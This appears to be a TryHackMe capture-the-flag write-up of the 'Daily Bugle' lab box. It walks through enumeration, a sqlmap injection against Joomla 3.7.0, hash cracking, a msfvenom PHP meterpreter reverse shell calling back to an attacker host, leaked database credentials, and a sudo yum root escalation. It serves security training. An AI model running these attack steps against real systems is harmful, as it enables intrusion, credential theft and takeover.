help@cyb4rgeek.xyz

+1 (512) 588 6950

TryHackMe writeup: Daily Bugle – The Daily Bugle is a fake news paper

Home/TryHackMe writeup: Daily Bugle...
TryHackMe writeup: Daily Bugle – The Daily Bugle is a fake news paper
Image Base: Dengeki Wiki (May 18, 2022 revision)
  1. Procedure
  2. End matter
  3. References

Probing

Figure 1
┌──(dna@deniers)-[~/dailybugle]
└─$ sudo nmap -sT -A -v -Pn -p- -O -sC -oX tcp_scan.xml --max-scan-delay=5s -T4 dailybugle.thm
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at [redacted]
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Initiating NSE at 06:01
Completed NSE at 06:01, 0.00s elapsed
Initiating Connect Scan at 06:01
Scanning dailybugle.thm [65535 ports]

[… snip …]

 

┌──(dna@deniers)-[~]
└─$ gobuster dir -u http://dailybugle.thm -w ./directories.txt -x php,bak,htm,html -t 40 -k
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dailybugle.thm
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                ./directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,bak,htm
[+] Timeout:                 10s
===============================================================
[redacted] Starting gobuster in directory enumeration mode
===============================================================

[… snip …]

 

[... snip ...]

<base href=”http://dailybugle.thm/” />
<meta name=”description” content=”New York City tabloid newspaper” />
<meta name=”generator” content=”Joomla! – Open Source Content Management” />
<title>Home</title>

[… snip …]

 

┌──(dna@deniers)-[~/dailybugle]
└─$ xsltproc tcp_scan.xml -o tcp_scan.html

┌──(dna@deniers)-[~/dailybugle]
└─$

 

Figure 2
[... snip ...]

/.htm (Status: 403) [Size: 206]
/images (Status: 301) [Size: 237] [–> http://dailybugle.thm/images/]
/index.php (Status: 200) [Size: 9286]
/.html (Status: 403) [Size: 207]
/media (Status: 301) [Size: 236] [–> http://dailybugle.thm/media/]
/templates (Status: 301) [Size: 240] [–> http://dailybugle.thm/templates/]
/modules (Status: 301) [Size: 238] [–> http://dailybugle.thm/modules/]
/bin (Status: 301) [Size: 234] [–> http://dailybugle.thm/bin/]
/plugins (Status: 301) [Size: 238] [–> http://dailybugle.thm/plugins/]
/includes (Status: 301) [Size: 239] [–> http://dailybugle.thm/includes/]
/language (Status: 301) [Size: 239] [–> http://dailybugle.thm/language/]
/components (Status: 301) [Size: 241] [–> http://dailybugle.thm/components/]
/cache (Status: 301) [Size: 236] [–> http://dailybugle.thm/cache/]
/libraries (Status: 301) [Size: 240] [–> http://dailybugle.thm/libraries/]
/tmp (Status: 301) [Size: 234] [–> http://dailybugle.thm/tmp/]
/layouts (Status: 301) [Size: 238] [–> http://dailybugle.thm/layouts/]
/administrator (Status: 301) [Size: 244] [–> http://dailybugle.thm/administrator/]
/configuration.php (Status: 200) [Size: 0]
/cli (Status: 301) [Size: 234] [–> http://dailybugle.thm/cli/]
/.html (Status: 403) [Size: 207]
/.htm (Status: 403) [Size: 206]
Progress: 515433 / 1038220 (49.65%)[ERROR] [redacted] [!] Get “http://dailybugle.thm/subrelated.bak”: context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] [redacted] [!] Get “http://dailybugle.thm/subrelated.htm”: context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] [redacted] [!] Get “http://dailybugle.thm/subtestimonials.php”: context deadline exceeded (Client.Timeout exceeded while awaiting headers)

[… snip …]

 

[... snip ...]

Processing http://dailybugle.thm …

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://dailybugle.thm/administrator/components
http://dailybugle.thm/administrator/modules
http://dailybugle.thm/administrator/templates
http://dailybugle.thm/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://dailybugle.thm/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dailybugle.thm/robots.txt

Interesting path found from robots.txt
http://dailybugle.thm/joomla/administrator/

[… snip …]

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

Your Report : reports/dailybugle.thm/

[… snip …]

 

http://dailybugle.thm/index.php/2-uncategorised/1-spider-man-robs-bank
http://dailybugle.thm/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml

Initial access: the SQL injection vulnerability

┌──(dna@deniers)-[~/dailybugle]
└─$ sqlmap -u "http://dailybugle.thm/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' --dump -v3

[… snip …]

[12:12:02] [DEBUG] cleaning up configuration parameters
[12:12:02] [DEBUG] setting the HTTP timeout
[12:12:02] [DEBUG] setting the HTTP User-Agent header
[12:12:02] [DEBUG] loading random HTTP User-Agent header(s) from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[12:12:02] [INFO] fetched random HTTP User-Agent header value ‘Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/526.3 (KHTML, like Gecko) Chrome/14.0.564.21 Safari/526.3’ from file ‘/usr/share/sqlmap/data/txt/user-agents.txt’
[12:12:02] [DEBUG] creating HTTP requests opener object
[12:12:03] [DEBUG] setting the HTTP Referer header to the target URL
[12:12:03] [DEBUG] setting the HTTP Host header to the target URL
[12:12:03] [DEBUG] resolving hostname ‘dailybugle.thm’
[12:12:03] [INFO] testing connection to the target URL
[12:12:03] [DEBUG] declared web page charset ‘utf-8’
[12:12:03] [DEBUG] got HTTP error code: 500 (‘Internal Server Error’)
[12:12:03] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own (‘eaa83fe8b963ab08ce9ab7d4a798de05=sv4pts6c7sg…pen4oo6pt1’). Do you want to use those [Y/n]

[… snip …]

 

Table 1

Initial access: password cracking

Figure 3
┌──(dna@deniers)-[~/dailybugle]
└─$ john joomla_hash --wordlist=./rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:38 0.02% 0g/s 76.68p/s 76.68c/s 76.68C/s raluca..maricar
0g 0:00:04:00 0.10% 0g/s 74.66p/s 74.66c/s 74.66C/s 121981..020891
spiderman123     (?)     <-- cracked password
1g 0:00:10:59 DONE 0.001517g/s 71.06p/s 71.06c/s 71.06C/s sweetsmile..speciala
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(dna@deniers)-[~/dailybugle]
└─$

 

Figure 4
Figure 5
┌──(dna@deniers)-[~/dailybugle]
└─$ sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=dailybugle.thm LPORT=4444 -f raw -o meterpreter.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes
Saved as: meterpreter.php

[… snip …]

 

┌──(dna@deniers)-[~/dailybugle]
└─$ sudo msfconsole
[sudo] password for dna:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker.thm
LHOST => attacker.thm
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on attacker.thm:4444

[… snip …]

 

┌──(dna@deniers)-[~/dailybugle]
└─$ curl http://dailybugle.thm/templates/protostar/logging.php

[… snip …]

 

[*] Started reverse TCP handler on attacker.thm:4444 
[*] Sending stage (39927 bytes) to dailybugle.thm
[*] Meterpreter session 1 opened (attacker.thm:4444 -> dailybugle.thm:42632) at [redacted]

meterpreter >

 

meterpreter > pwd
/var/www/html/templates/protostar
meterpreter > cd ../..
meterpreter > pwd
/var/www/html
meterpreter > cat configuration.php
<?php
class JConfig {

[… snip …]

public $host = ‘localhost’;
public $user = ‘root’;
public $password = ‘nv5uz9r3ZEDzVjNu’;
public $db = ‘joomla’;

[… snip …]

public $shared_session = ‘0’;
}meterpreter >

 

}meterpreter > ls /home
Listing: /home
==============

Mode Size Type Last modified Name
—- —- —- ————- —-
040700/rwx—— 99 dir 2019-12-15 19:47:48 -0500 jjameson

meterpreter >

 

┌──(dna㉿deniers)-[~/dailybugle]
└─$ ssh jjameson@dailybugle.thm    
jjameson@dailybugle.thm's password: 
Last login: Mon Dec 16 05:14:55 2019 from netwars
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ ls
user.txt
[jjameson@dailybugle ~]$ cat user.txt
[redacted]
[jjameson@dailybugle ~]$

Post-exploitation

[jjameson@dailybugle ~]$ find / -type f -perm /4000 -print 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
[jjameson@dailybugle ~]$

 

[jjameson@dailybugle ~]$ find / -type f -name root.txt -print 2>/dev/null
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$ 
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$ 
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ 
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#
sh-4.2# cat /root/root.txt
[redacted]
sh-4.2#
  • When initial access is gained, do not assume that the privileges gotten are the same as any other user. The Apache HTTP server’s privileges were not the same as jjameson’s.
  • Sometimes more probing is needed to gain access to different parts of the target system and not necessarily the root account. In some cases, it may not be possible to gain root access to a target system, so an offensive security engineer will need to settle with whatever non-root privileges they can get.
  • Joomla!’s configuration.php file can have useful information regarding the target system. Be sure to add those to your “mind maps.” Furthermore, Joomla! can be easily hacked to store PHP scripts allowing for backdoors.

Acknowledgements

Call to action: Mira Lazine

Call to action: My stuff

Aleksey

Technical writeups

Leave a Reply